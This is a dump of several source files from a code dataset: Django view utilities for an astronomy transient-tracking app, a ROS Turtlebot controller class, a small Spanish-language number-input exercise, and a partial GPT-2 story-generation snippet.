True\n","sub_path":"Lab_1/Problem_1/src/file_classes/InputFile.py","file_name":"InputFile.py","file_ext":"py","file_size_in_byte":2512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"390391768","text":"# utils for generating webpage views\nimport django\nfrom django.http import HttpResponse,JsonResponse\nfrom django.shortcuts import render, get_object_or_404, render_to_response\nimport copy\nfrom .models import *\nfrom astropy.coordinates import EarthLocation\nfrom astropy.coordinates import get_moon, SkyCoord\nfrom astropy.time import Time\nimport astropy.units as u\nimport datetime\nimport json\nimport numpy as np\nfrom django.conf import settings as djangoSettings\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\nfrom django.views.generic import TemplateView\n\ndef get_recent_phot_for_host(host_id=None):\n\n\thost = Host.objects.filter(id=host_id)\n\tphotometry = HostPhotometry.objects.filter(host=host_id)\n\n\tphotdata = False\n\tfor p in photometry:\n\t\tphotdata = HostPhotData.objects.filter(photometry=p.id).order_by('-obs_date')\n\n\t\n\tif photdata:\t\n\t\treturn(photdata[0])\n\telse:\n\t\treturn(None)\n\ndef get_all_phot_for_transient(transient_id=None):\n\n\ttransient = Transient.objects.filter(id=transient_id)\n\tphotometry = TransientPhotometry.objects.filter(transient=transient_id)\n\n\tphotdata = False\n\tpidlist = []\n\tfor p in photometry:\n\t\tpidlist += [p.id]\n\tphotdata = TransientPhotData.objects.filter(photometry__in=pidlist)\n\n\tif photdata:\t\n\t\treturn(photdata)\n\telse:\n\t\treturn(None)\n\n\t\ndef get_recent_phot_for_transient(transient_id=None):\n\n\ttransient = Transient.objects.filter(id=transient_id)\n\tphotometry = TransientPhotometry.objects.filter(transient=transient_id)\n\n\tphotdata = False\n\tfor p in photometry:\n\t\tphotdata = TransientPhotData.objects.filter(photometry=p.id).order_by('-obs_date')\n\n\t\n\tif photdata:\t\n\t\treturn(photdata[0])\n\telse:\n\t\treturn(None)\n\ndef get_disc_phot_for_transient(transient_id=None):\n\n\ttransient = Transient.objects.filter(id=transient_id)\n\tphotometry = TransientPhotometry.objects.filter(transient=transient_id)\n\n\tphotdata = False\n\tfirstphot = None\n\tfor p in photometry:\n\t\tphotdata = TransientPhotData.objects.filter(photometry=p.id).order_by('-obs_date')[::-1]\n\t\tfor ph in photdata:\n\t\t\tif ph.discovery_point:\n\t\t\t\treturn(ph)\n\t\t\telif ph.mag:\n\t\t\t\tfirstphot = ph\n\t\t\t\n\treturn(firstphot)\n\ndef get_disc_mag_for_transient(transient_id=None):\n\n\ttransient = Transient.objects.filter(id=transient_id)\n\tphotometry = TransientPhotometry.objects.filter(transient=transient_id)\n\n\tphotdata = False\n\tfirstphot = None\n\tfor p in photometry:\n\t\t\tphotdata = TransientPhotData.objects.filter(photometry=p.id).order_by('-obs_date')[::-1]\n\t\t\tfor ph in photdata:\n\t\t\t\tif ph.discovery_point:\n\t\t\t\t\treturn(ph)\n\t\t\t\telif ph.mag:\n\t\t\t\t\tfirstphot = ph\n\n\treturn(firstphot)\n\n\t\ndef getMoonAngle(observingdate,telescope,ra,dec):\n\tif observingdate:\n\t\tobstime = Time(observingdate,scale='utc')\n\telse:\n\t\tobstime = Time(datetime.datetime.now())\n\tmooncoord = get_moon(obstime)\n\tcs = SkyCoord(ra,dec,unit=u.deg)\n\treturn('%.1f'%cs.separation(mooncoord).deg)\n\t\ndef getObsNights(transient):\n\n\tobsnights,tellist = (),()\n\tfor o in ClassicalObservingDate.objects.order_by('-obs_date')[::-1]:\n\t\tif not o.happening_soon(): continue\n\t\ttelescope = 
get_telescope_from_obsnight(o.id)\n\t\tobservatory = get_observatory_from_telescope(telescope.id)\n\t\tcan_obs = 1\n\t\to.telescope = telescope.name\n\t\tobsnights += ([o,can_obs],)\n\t\tif can_obs and telescope not in tellist: tellist += (telescope,)\n\treturn obsnights,tellist\n\ndef getTimeUntilRiseSet(ra,dec,date,lat,lon,elev,utc_off):\n\tif date:\n\t\ttime = Time(date)\n\telse:\n\t\ttime = Time(datetime.datetime.now())\n\tsc = SkyCoord(ra,dec,unit=u.deg)\n\n\tlocation = EarthLocation.from_geodetic(\n\t\tlon*u.deg,lat*u.deg,\n\t\telev*u.m)\n\ttel = Observer(location=location, timezone=\"UTC\")\n\t#night_start = tel.twilight_evening_civil(time,which=\"previous\")\n\t#night_end = tel.twilight_morning_civil(time,which=\"previous\")\n\ttarget_rise_time = tel.target_rise_time(time,sc,horizon=18*u.deg,which=\"previous\")\n\ttarget_set_time = tel.target_set_time(time,sc,horizon=18*u.deg,which=\"previous\")\n\t\n#\t start_obs = False\n#\t starttime,endtime = None,None\n#\t for jd in np.arange(night_start.mjd,night_end.mjd,0.05):\n#\t\t time = Time(jd,format=\"mjd\")\n#\t\t target_up = tel.target_is_up(time,sc,horizon=18*u.deg)\n#\t\t if target_up and not start_obs:\n#\t\t\t start_obs = True\n#\t\t\t starttime = copy.copy(time)\n#\t\t if not target_up and start_obs:\n#\t\t\t can_obs = False\n#\t\t\t endtime = copy.copy(time)\n#\t\t\t break\n\n\tif target_rise_time:\n\t\treturnstarttime = target_rise_time.isot.split('T')[-1]\n\telse: returnstarttime = None\n\tif target_set_time:\n\t\treturnendtime = target_set_time.isot.split('T')[-1]\n\telse: returnendtime = None\n\n\t\n\treturn(returnstarttime,returnendtime)\n\n\t\ndef telescope_can_observe(ra,dec,date,lat,lon,elev,utc_off):\n\tif date:\n\t\ttime = Time(date)\n\telse:\n\t\ttime = Time(datetime.datetime.now())\n\tsc = SkyCoord(ra,dec,unit=u.deg)\n\n\tlocation = EarthLocation.from_geodetic(\n\t\tlon*u.deg,lat*u.deg,\n\t\telev*u.m)\n\ttel = Observer(location=location, timezone=\"UTC\")\n\t\n\tnight_start = tel.twilight_evening_astronomical(time,which=\"previous\")\n\tnight_end = tel.twilight_morning_astronomical(time,which=\"previous\")\n\tcan_obs = False\n\tfor jd in np.arange(night_start.mjd,night_end.mjd,0.02):\n\t\ttime = Time(jd,format=\"mjd\")\n\t\ttarget_up = tel.target_is_up(time,sc,horizon=18*u.deg)\n\t\tif target_up:\n\t\t\tcan_obs = True\n\t\t\tbreak\n\n\treturn(can_obs)\n\ndef get_observatory_from_telescope(telescope_id):\n\ttel = Telescope.objects.filter(id=telescope_id)[0]\n\tobservatory = Observatory.objects.filter(id=tel.observatory_id)[0]\n\treturn(observatory)\n\ndef get_telescope_from_obsnight(obsnight_id):\n\tclassobsdate = ClassicalObservingDate.objects.filter(id=obsnight_id)[0]\n\tclassresource = ClassicalResource.objects.filter(id=classobsdate.resource_id)[0]\n\ttelescope = Telescope.objects.filter(id=classresource.telescope_id)[0]\n\treturn(telescope)\n\nclass finder(TemplateView):\n\ttemplate_name = 'YSE_App/finder.html'\n\t\n\tdef __init__(self):\n\t\tpass\n\tdef finderchart(self, request, transient_id):\n\t\timport os\n\t\tfrom .util import mkFinderChart\n\n\t\tfrom django.contrib.staticfiles.templatetags.staticfiles import static\n\t\tfrom matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas\n\t\tfrom matplotlib.figure import Figure\n\t\n\t\ttransient = Transient.objects.get(pk=transient_id)\n\t\tbasedir = \"%sYSE_App/images/findercharts\"%(djangoSettings.STATIC_ROOT)\n\t\tif not os.path.exists(basedir):\n\t\t\tos.makedirs(basedir)\n\t\t\n\t\toutputOffsetFileName = 
'%s/%s.offsetstars.txt'%(\n\t\t\tbasedir,transient.name)\n\t\toutputFinderFileName = '%s/%s.finder.png'%(\n\t\t\tbasedir,transient.name)\n\t\tif os.path.exists(outputOffsetFileName) and\\\n\t\t os.path.exists(outputFinderFileName):\n\t\t\treturn HttpResponseRedirect(reverse('transient_detail',\n\t\t\t\t\t\t\t\t\t\t\t\targs=(transient.id,)))\n\n\t\tfind = mkFinderChart.finder()\n\t\tparser = find.add_options(usage='')\n\t\toptions, args = parser.parse_args()\n\t\toptions.ra = str(transient.ra)\n\t\toptions.dec = str(transient.dec)\n\t\toptions.snid = transient.name\n\t\t#options.outputOffsetFileName = outputOffsetFileName\n\t\toptions.outputFinderFileName = outputFinderFileName\n\t\tfind.options = options\n\t\timport pylab as plt\n\t\n\t\tfig=Figure()\n\t\tax = fig.add_axes([0.2,0.3,0.6,0.6])\n\t\tcanvas=FigureCanvas(fig)\n\t\tax,offdictlist = find.mkChart(options.ra,options.dec,\n\t\t\t\t\t\t\t\t\t options.outputFinderFileName,\n\t\t\t\t\t\t\t\t\t ax=ax,saveImg=False)\n\t\t\n\t\tcontext = {'t':transient,\n\t\t\t\t 'offsets':offdictlist}\n\t\t\n\t\t#return response\n\t\treturn render(request,'YSE_App/finder.html',\n\t\t\t\t\t context)\n\n\tdef finderim(self, request, transient_id):\n\t\timport os\n\t\tfrom .util import mkFinderChart\n\t\tfrom matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas\n\t\tfrom matplotlib.figure import Figure\n\t\timport pylab as plt\n\t\ttransient = Transient.objects.get(pk=transient_id)\n\t\tbasedir = \"%sYSE_App/images/findercharts\"%(djangoSettings.STATIC_ROOT)\n\t\tif not os.path.exists(basedir):\n\t\t\tos.makedirs(basedir)\n\t\t\n\t\toutputOffsetFileName = '%s/%s.offsetstars.txt'%(\n\t\t\tbasedir,transient.name)\n\t\toutputFinderFileName = '%s/%s.finder.png'%(\n\t\t\tbasedir,transient.name)\n\t\tif os.path.exists(outputOffsetFileName) and\\\n\t\t os.path.exists(outputFinderFileName):\n\t\t\treturn HttpResponseRedirect(reverse('transient_detail',\n\t\t\t\t\t\t\t\t\t\t\t\targs=(transient.id,)))\n\n\t\t\n\t\tfig=Figure()\n\t\tax = fig.add_axes([0.2,0.3,0.6,0.6])\n\t\tcanvas=FigureCanvas(fig)\n\n\t\tfind = mkFinderChart.finder()\n\t\tparser = find.add_options(usage='')\n\t\toptions, args = parser.parse_args()\n\t\toptions.ra = str(transient.ra)\n\t\toptions.dec = str(transient.dec)\n\t\toptions.snid = transient.name\n\t\t#options.outputOffsetFileName = outputOffsetFileName\n\t\toptions.outputFinderFileName = outputFinderFileName\n\t\tfind.options = options\n\t\tax,offdictlist = find.mkChart(options.ra,options.dec,\n\t\t\t\t\t\t\t\t\t options.outputFinderFileName,\n\t\t\t\t\t\t\t\t\t ax=ax,saveImg=False)\n\t\t\n\t\tresponse=django.http.HttpResponse(content_type='image/png')\n\t\tcanvas.print_png(response)\n\n\t\treturn response\n\t\n## We should refactor this so that it takes:\n# - transient\n# - observatory (or maybe array of observatory)\n# - \n# And it can returns the data which can be plotted on the front end\n# i.e. 
a tuple of (datetime, airmass) that ChartJS can plot on the \n# client \n \ndef airmassplot(request, transient_id, obs_id, telescope_id):\n\t\timport random\n\t\timport django\n\t\timport datetime\n\t\tfrom astroplan.plots import plot_airmass\n\t\t\n\t\tfrom matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas\n\t\tfrom matplotlib.figure import Figure\n\t\tfrom matplotlib.dates import DateFormatter\n\t\tfrom matplotlib import rcParams\n\t\trcParams['figure.figsize'] = (7,7)\n\t\t\n\t\ttransient = Transient.objects.get(pk=transient_id)\n\t\tif int(obs_id):\n\t\t\tobsnight = ClassicalObservingDate.objects.get(pk=obs_id)\n\t\t\tobs_date = obsnight.obs_date\n\t\telse:\n\t\t\tobs_date = datetime.date.today() #time.now()\n\t\t\t\n\t\ttelescope = Telescope.objects.get(pk=telescope_id)\n\t\t\n\t\ttarget = SkyCoord(transient.ra,transient.dec,unit=u.deg)\n\t\ttime = Time(str(obs_date).split('+')[0], format='iso')\n\t\t\n\t\tlocation = EarthLocation.from_geodetic(telescope.longitude*u.deg, telescope.latitude*u.deg,telescope.elevation*u.m)\n\t\ttel = Observer(location=location, name=telescope.name, timezone=\"UTC\")\n\t\t\n\t\tfig=Figure()\n\t\tax=fig.add_subplot(111)\n\t\tcanvas=FigureCanvas(fig)\n\n\t\tax.set_title(\"%s, %s, %s\"%(telescope.tostring(),transient.name, obs_date))\n\n\t\tnight_start = tel.twilight_evening_astronomical(time,which=\"previous\")\n\t\tnight_end = tel.twilight_morning_astronomical(time,which=\"previous\")\n\t\tdelta_t = night_end - night_start\n\t\tobserve_time = night_start + delta_t*np.linspace(0, 1, 75)\n\t\tplot_airmass(target, tel, observe_time, ax=ax)\t \n\n\t\tyr,mn,day,hr,minu,sec = night_start.iso.replace(':',' ').replace('-',' ').split()\n\t\tstarttime = datetime.datetime(int(yr),int(mn),int(day),int(hr),int(minu))\n\t\tif int(hr) == 0:\n\t\t\txlow = datetime.datetime(int(yr),int(mn),int(day)-1,23,int(minu))\n\t\telse:\n\t\t\txlow = datetime.datetime(int(yr),int(mn),int(day),int(hr)-1,int(minu))\n\t\tyr,mn,day,hr,minu,sec = night_end.iso.replace(':',' ').replace('-',' ').split()\n\t\tendtime = datetime.datetime(int(yr),int(mn),int(day),int(hr),int(minu))\n\t\txhi = datetime.datetime(int(yr),int(mn),int(day),int(hr)+1,int(minu))\n\t\tax.axvline(starttime,color='r',label='18 deg twilight')#night_start.iso)\n\t\tax.axvline(endtime,color='r')\n\t\tax.legend(loc='lower right')\n\t\t\n\t\tax.set_xlim([xlow,xhi])\n\t\t\n\t\tresponse=django.http.HttpResponse(content_type='image/png')\n\t\tcanvas.print_png(response)\n\t\treturn response\n\ndef lightcurveplot(request, transient_id):\n\t\n\t\timport random\n\t\timport django\n\t\timport datetime\n\t\timport time\n\t\tfrom bokeh.plotting import figure\n\t\tfrom bokeh.resources import CDN\n\t\tfrom bokeh.embed import file_html\n\t\tfrom bokeh.models import Range1d,Span\n\t\tfrom bokeh.core.properties import FontSizeSpec\n\t\ttstart = time.time()\n\t\t\n\t\ttransient = Transient.objects.get(pk=transient_id)\n\t\tphotdata = get_all_phot_for_transient(transient_id)\n\t\tif not photdata:\n\t\t\treturn django.http.HttpResponse('')\n\n\t\tax=figure()\n\n\t\tmjd,mag,magerr,band,bandstr,telescope = \\\n\t\t\tnp.array([]),np.array([]),np.array([]),np.array([]),np.array([]),np.array([])\n\t\tlimmjd = None\n\t\tfor p in photdata:\n\t\t\tif p.flux and np.abs(p.flux) > 1e10: continue\n\t\t\tif not p.mag: continue\n\t\t\t\n\t\t\tif p.discovery_point:\n\t\t\t\tlimmjd = p.date_to_mjd()-30\n\t\t\t\t\n\t\t\tmjd = np.append(mjd,[p.date_to_mjd()])\n\t\t\tmag = np.append(mag,[p.mag])\n\t\t\tif p.mag_err: magerr = 
np.append(magerr,p.mag_err)\n\t\t\telse: magerr = np.append(magerr,0)\n\t\t\tbandstr = np.append(bandstr,str(p.band))\n\t\t\tband = np.append(band,p.band)\n\t\t\t#telescope = np.append(telescope,str(p.band.instrument.telescope.name))\n\t\t\n\t\tax.title.text = \"%s\"%transient.name\n\t\tcolorlist = ['#1f77b4','#ff7f0e','#2ca02c','#d62728',\n\t\t\t\t\t '#9467bd','#8c564b','#e377c2','#7f7f7f','#bcbd22','#17becf']\n\t\tcount = 0\n\n\t\tbandunq,idx = np.unique(bandstr,return_index=True)\n\t\tfor bs,b in zip(bandunq,band[idx]):\n\t\t\tcoloridx = count % len(np.unique(colorlist))\n\t\t\tax.circle(mjd[bandstr == bs].tolist(),mag[bandstr == bs].tolist(),\n\t\t\t\t\t color=colorlist[coloridx],size=7,legend='%s - %s'%(\n\t\t\t\t\tb.instrument.telescope.name,b.name))\n\n\t\t\terr_xs,err_ys = [],[]\n\t\t\tfor x,y,yerr in zip(mjd[bandstr == bs].tolist(),mag[bandstr == bs].tolist(),magerr[bandstr == bs].tolist()):\n\t\t\t\terr_xs.append((x, x))\n\t\t\t\terr_ys.append((y - yerr, y + yerr))\n\t\t\tax.multi_line(err_xs, err_ys, color=colorlist[coloridx])\n\t\t\tcount += 1\n\t\t\t\n\t\ttoday = Time(datetime.datetime.today()).mjd\n\t\tax.line(today,20,line_width=3,line_color='black',legend='today (%i)'%today)\n\t\tvline = Span(location=today, dimension='height', line_color='black',\n\t\t\t\t\t line_width=3)\n\t\tax.add_layout(vline)\n\t\tax.legend.location = 'bottom_left'\n\t\tax.legend.label_height = 1\n\t\tax.legend.glyph_height = 10\n\t\t#import pdb; pdb.set_trace()\n\t\tax.legend.label_text_font_size = \"7pt\"#FontSizeSpec(\"10\")\n\t\t\n\t\tax.xaxis.axis_label = 'MJD'\n\t\tax.yaxis.axis_label = 'Mag'\n\n\t\tif limmjd:\n\t\t\tax.x_range = Range1d(limmjd,np.max(mjd)+10)\n\t\t\tax.y_range = Range1d(np.max(mag[mjd > limmjd])+0.25,np.min(mag[mjd > limmjd])-0.5)\n\t\telse:\n\t\t\tax.x_range=Range1d(np.min(mjd)-10,np.max(mjd)+10)\n\t\t\tax.y_range=Range1d(np.max(mag)+0.25,np.min(mag)-0.5)\n\t\t#ax.legend()\n\t\tax.plot_height = 400\n\t\tax.plot_width = 500\n\t\t\n\t\t#ax.grid(color='lightgray', alpha=0.7)\n\t\t#g = mpld3.fig_to_html(fig,template_type='simple')\n\n\t\tg = file_html(ax,CDN,\"my plot\")\n\t\t\n\t\treturn HttpResponse(g.replace('width: 90%','width: 100%'))\n\ndef rise_time(request,transient_id,obs_id):\n\n\timport time\n\ttstart = time.time()\n\ttransient = Transient.objects.filter(id=transient_id)[0]\n\tcoords = transient.CoordString()\n\n\tobsnight = ClassicalObservingDate.objects.get(pk=obs_id)\n\t\n\ttme = Time(str(obsnight.obs_date).split()[0])\n\tsc = SkyCoord('%s %s'%(coords[0],coords[1]),unit=(u.hourangle,u.deg))\n\n\tlocation = EarthLocation.from_geodetic(\n\t\tobsnight.resource.telescope.longitude*u.deg,obsnight.resource.telescope.latitude*u.deg,\n\t\tobsnight.resource.telescope.elevation*u.m)\n\ttel = Observer(location=location, timezone=\"UTC\")\n\n\ttarget_rise_time = tel.target_rise_time(tme,sc,horizon=18*u.deg,which=\"previous\")\n\t\n\tif target_rise_time:\n\t\trisetime = target_rise_time.isot.split('T')[-1]\n\telse: \n\t\trisetime = None\n\t\t\t\n\tprint(time.time()-tstart)\n\trisedict = {'rise_time':risetime}\n\treturn JsonResponse(risedict)\n\ndef set_time(request,transient_id,obs_id):\n\n\timport time\n\ttstart = time.time()\n\ttransient = Transient.objects.filter(id=transient_id)[0]\n\tcoords = transient.CoordString()\n\n\tobsnight = ClassicalObservingDate.objects.get(pk=obs_id)\n\t\n\ttme = Time(str(obsnight.obs_date).split()[0])\n\tsc = SkyCoord('%s %s'%(coords[0],coords[1]),unit=(u.hourangle,u.deg))\n\n\tlocation = 
EarthLocation.from_geodetic(\n\t\tobsnight.resource.telescope.longitude*u.deg,obsnight.resource.telescope.latitude*u.deg,\n\t\tobsnight.resource.telescope.elevation*u.m)\n\ttel = Observer(location=location, timezone=\"UTC\")\n\n\ttarget_set_time = tel.target_set_time(tme,sc,horizon=18*u.deg,which=\"previous\")\n\t\n\tif target_set_time:\n\t\tsettime = target_set_time.isot.split('T')[-1]\n\telse: \n\t\tsettime = None\n\t\t\t\n\tprint(time.time()-tstart)\n\tsetdict = {'set_time':settime}\n\treturn JsonResponse(setdict)\n\ndef moon_angle(request,transient_id,obs_id):\n\ttransient = Transient.objects.filter(id=transient_id)[0]\n\tcoords = transient.CoordString()\n\n\tobsnight = ClassicalObservingDate.objects.get(pk=obs_id)\n\t\n\tobstime = Time(str(obsnight.obs_date).split()[0],scale='utc')\n\n\tmooncoord = get_moon(obstime)\n\tcs = SkyCoord('%s %s'%(coords[0],coords[1]),unit=(u.hourangle,u.deg))\n\tmoondict = {'moon_angle':'%.1f deg'%cs.separation(mooncoord).deg}\n\treturn JsonResponse(moondict)\n\ndef tonight_rise_time(request,transient_id,too_id):\n\ttransient = Transient.objects.filter(id=transient_id)[0]\n\tcoords = transient.CoordString()\n\n\tobsnight = ToOResource.objects.filter(id=too_id)[0]\n\t\n\ttime = Time(datetime.datetime.now())\n\tsc = SkyCoord('%s %s'%(coords[0],coords[1]),unit=(u.hourangle,u.deg))\n\n\tlocation = EarthLocation.from_geodetic(\n\t\tobsnight.telescope.longitude*u.deg,obsnight.telescope.latitude*u.deg,\n\t\tobsnight.telescope.elevation*u.m)\n\ttel = Observer(location=location, timezone=\"UTC\")\n\n\ttarget_rise_time = tel.target_rise_time(time,sc,horizon=18*u.deg,which=\"previous\")\n\n\tif target_rise_time:\n\t\treturnstarttime = target_rise_time.isot.split('T')[-1]\n\telse: returnstarttime = None\n\n\trisedict = {'rise_time':returnstarttime}\n\treturn JsonResponse(risedict)\n\t\n\ndef tonight_set_time(request,transient_id,too_id):\n\ttransient = Transient.objects.filter(id=transient_id)[0]\n\tcoords = transient.CoordString()\n\n\tobsnight = ToOResource.objects.filter(id=too_id)[0]\n\t\n\ttime = Time(datetime.datetime.now())\n\tsc = SkyCoord('%s %s'%(coords[0],coords[1]),unit=(u.hourangle,u.deg))\n\n\tlocation = EarthLocation.from_geodetic(\n\t\tobsnight.telescope.longitude*u.deg,obsnight.telescope.latitude*u.deg,\n\t\tobsnight.telescope.elevation*u.m)\n\ttel = Observer(location=location, timezone=\"UTC\")\n\n\ttarget_set_time = tel.target_set_time(time,sc,horizon=18*u.deg,which=\"previous\")\n\n\tif target_set_time:\n\t\treturnstarttime = target_set_time.isot.split('T')[-1]\n\telse: returnstarttime = None\n\n\tsetdict = {'set_time':returnstarttime}\n\treturn JsonResponse(setdict)\n\t\ndef tonight_moon_angle(request,transient_id,too_id):\n\ttransient = Transient.objects.filter(id=transient_id)[0]\n\tcoords = transient.CoordString()\n\n\tobstime = Time(datetime.datetime.now())\n\tmooncoord = get_moon(obstime)\n\tcs = SkyCoord('%s %s'%(coords[0],coords[1]),unit=(u.hourangle,u.deg))\n\tmoondict = {'moon_angle':'%.1f deg'%cs.separation(mooncoord).deg}\n\treturn JsonResponse(moondict)\n\ndef get_ps1_image(request,transient_id):\n\t\n\ttry:\n\t\tt = Transient.objects.get(pk=transient_id)\n\texcept t.DoesNotExist:\n\t\traise Http404(\"Transient id does not exist\")\n\n\tps1url = (\"http://plpsipp1v.stsci.edu/cgi-bin/ps1cutouts?pos=%.7f+%.7f&filter=color\" % (t.ra,t.dec))\n\ttry:\n\t\tresponse = requests.get(url=ps1url,timeout=5)\n\texcept: return(\"\")\n\tresponse_text = response.content.decode('utf-8')\n\tif \"')[0]\n\t\tjpegurl = 
\"http:%s\"%jpegurl\n\telse:\n\t\tjpegurl=\"\"\n\n\tjpegurldict = {\"jpegurl\":jpegurl}\n\treturn(JsonResponse(jpegurldict))\n\n\ndef get_hst_image(request,transient_id):\n\t\n\ttry:\n\t\tt = Transient.objects.get(pk=transient_id)\n\texcept t.DoesNotExist:\n\t\traise Http404(\"Transient id does not exist\")\n\n\tstartTime = datetime.datetime.now()\n\tfrom . import common\n\thst=common.mast_query.hstImages(t.ra,t.dec,'Object')\n\thst.getObstable()\n\thst.getJPGurl()\n\tprint(\"I found\",hst.Nimages,\"HST images of\",hst.object,\"located at coordinates\",hst.ra,hst.dec)\n\tprint(\"The cut out images have the following URLs:\")\n\tfitsurllist = []\n\tfor jpg,i in zip(hst.jpglist,range(len(hst.jpglist))):\n\t\tprint(jpg)\n\t\tfitsurllist += [\"https://hla.stsci.edu/cgi-bin/getdata.cgi?config=ops&dataset=%s\"%str(hst.obstable[\"obs_id\"][i]).lower()]\n\tprint(\"Run time was: \",(datetime.datetime.now() - startTime).total_seconds(),\"seconds\")\n\n\tif len(hst.jpglist):\n\t\tjpegurldict = {\"jpegurl\":hst.jpglist,\n\t\t\t\t\t \"fitsurl\":fitsurllist,#list(hst.obstable[\"dataURL\"]),\n\t\t\t\t\t \"obsdate\":list(Time(hst.obstable[\"t_min\"],format='mjd',out_subfmt='date').iso),\n\t\t\t\t\t \"filters\":list(hst.obstable[\"filters\"]),\n\t\t\t\t\t \"inst\":list(hst.obstable[\"instrument_name\"])}\n\telse:\n\t\tjpegurldict = {\"jpegurl\":[],\n\t\t\t\t\t \"fitsurl\":[],\n\t\t\t\t\t \"obsdate\":[],\n\t\t\t\t\t \"filters\":[],\n\t\t\t\t\t \"inst\":[]}\n\n\treturn(JsonResponse(jpegurldict))\n","sub_path":"YSE_App/view_utils.py","file_name":"view_utils.py","file_ext":"py","file_size_in_byte":20242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"345563402","text":"import sys\nimport time\nimport numpy as np\n\nimport rospy\n\nfrom kobuki_msgs.msg import BumperEvent\nfrom geometry_msgs.msg import Twist\nfrom nav_msgs.msg import Odometry\nfrom tf import transformations as trans\n\n_turtlebot_singleton = None\n\n\ndef get_robot():\n global _turtlebot_singleton\n if _turtlebot_singleton is None:\n _turtlebot_singleton = Turtlebot()\n return _turtlebot_singleton\n\n\nclass Turtlebot(object):\n max_linear = 1.0\n max_angular = 2.0\n\n def __init__(self):\n rospy.init_node('pyturtlebot', anonymous=True)\n rospy.myargv(argv=sys.argv)\n\n self.__x = None\n self.__y = None\n self.__angle = None\n self.__cumulative_angle = 0.0\n self.__have_odom = False\n\n self.on_bumper = None\n\n self.__cmd_vel_pub = rospy.Publisher('/mobile_base/commands/velocity', Twist)\n self.__bumper_sub = rospy.Subscriber('/mobile_base/events/bumper', BumperEvent, self.__bumper_handler)\n self.__odom_sub = rospy.Subscriber('/odom', Odometry, self.__odom_handler)\n\n def move(self, linear=0.0, angular=0.0):\n # Bounds checking\n if abs(linear) > self.max_linear:\n self.say(\"Whoa! Slowing you down to within +/-{0} m/s...\".format(self.max_linear))\n linear = self.max_linear if linear > self.max_linear else linear\n linear = -self.max_linear if linear < -self.max_linear else linear\n if abs(angular) > self.max_angular:\n self.say(\"Whoa! 
Slowing you down to within +/-{0} rad/s...\".format(self.max_angular))\n angular = self.max_angular if angular > self.max_angular else angular\n angular = -self.max_angular if angular < -self.max_angular else angular\n # Message generation\n msg = Twist()\n msg.linear.x = linear\n msg.angular.z = angular\n # Announce and publish\n self.say(\"Moving ('{linear}' m/s, '{angular}' rad/s)...\".format(linear=linear, angular=angular))\n self.__cmd_vel_pub.publish(msg)\n\n def move_distance(self, distance, velocity=1.0):\n # No bounds checking because we trust people. Not like William.\n r = rospy.Rate(1)\n while not self.__have_odom and not rospy.is_shutdown():\n self.say(\"Waiting for odometry\")\n r.sleep()\n\n msg = Twist()\n msg.linear.x = velocity\n x0 = self.__x\n y0 = self.__y\n r = rospy.Rate(100)\n while not rospy.is_shutdown():\n d = ((self.__x - x0)**2 + (self.__y - y0)**2)**0.5\n if d >= distance:\n break\n\n self.__cmd_vel_pub.publish(msg)\n r.sleep()\n msg.linear.x = 0.0\n self.__cmd_vel_pub.publish(msg)\n\n def turn_angle(self, angle, velocity=1.0):\n # No bounds checking because we trust people. Not like William.\n r = rospy.Rate(1)\n while not self.__have_odom and not rospy.is_shutdown():\n self.say(\"Waiting for odometry\")\n r.sleep()\n\n msg = Twist()\n if angle >= 0:\n msg.angular.z = np.abs(velocity)\n else:\n msg.angular.z = -np.abs(velocity)\n angle0 = self.__cumulative_angle\n r = rospy.Rate(100)\n while not rospy.is_shutdown():\n a_diff = self.__cumulative_angle - angle0\n if (angle > 0 and a_diff >= angle) or (angle < 0 and a_diff <= angle):\n break\n\n self.__cmd_vel_pub.publish(msg)\n r.sleep()\n msg.angular.z = 0.0\n self.__cmd_vel_pub.publish(msg)\n\n def stop(self):\n msg = Twist()\n msg.linear.x = 0.0\n msg.angular.z = 0.0\n self.say(\"Stopping the robot!\")\n self.__cmd_vel_pub.publish(msg)\n\n def wait(self, seconds):\n self.say(\"Waiting for '{0}' seconds.\".format(seconds))\n time.sleep(seconds)\n\n def say(self, msg):\n print(msg)\n sys.stdout.flush()\n\n def __odom_handler(self, msg):\n self.__x = msg.pose.pose.position.x\n self.__y = msg.pose.pose.position.y\n q = msg.pose.pose.orientation\n a = trans.euler_from_quaternion([q.x, q.y, q.z, q.w])[2]\n\n # cumulative angle doesn't wrap. assumes we've not moved more than pi radians\n # since last odom message\n if self.__have_odom:\n a_diff = a - self.__angle\n if a_diff > np.pi:\n a_diff -= 2*np.pi\n elif a_diff < -np.pi:\n a_diff += 2*np.pi\n self.__cumulative_angle += a_diff\n\n self.__angle = a\n self.__have_odom = True\n\n def __bumper_handler(self, msg):\n if msg.state != BumperEvent.PRESSED or msg.bumper != BumperEvent.CENTER:\n return\n if self.on_bumper is not None:\n self.on_bumper.__call__()\n","sub_path":"src/pyturtlebot/turtlebot.py","file_name":"turtlebot.py","file_ext":"py","file_size_in_byte":4772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"566324390","text":"#Práctica 5 - Ejercicio 4 - Carlos Cánovas\n#Escriu un programa que te demani dos nombres, de manera que el segon sigui major que el primer.\n#El programa termina escrivint els dos nombre tal i com es demana. \n#\n\na = float(input(\"Introduzca un numero: \"))\nb = float(input(\"Introduzca un numero mayor que %d: \" % (a)))\n\nwhile (b <= a):\n b = float(input(\"%d no es mayor que %d. 
Vuelve a introducir un numero: \" % (b,a)))\nprint(\"Los numeros escritos son %d y %d\" % (a,b))\n","sub_path":"Python/A5/Actividad Python 5-4.py","file_name":"Actividad Python 5-4.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"172910444","text":"from transformers import pipeline\n\nfrom utils import Context, get_logger, profile_resource_usage\n\nl = get_logger(__name__)\n\nwith profile_resource_usage('story generator'):\n story_gen = pipeline(\n \"text-generation\", \"pranavpsv/gpt2-genre-story-generator\")\n\n\nasync def generate_story(ctx: Context, genre: str, prompt: str,\n max_length: int = 400):\n start = f' <{genre}> '\n out = story_gen(f'{start}{prompt}', max_length=max_length)\n text: str = out[0]['generated_text']\n text = text.replace(start, '')\n await 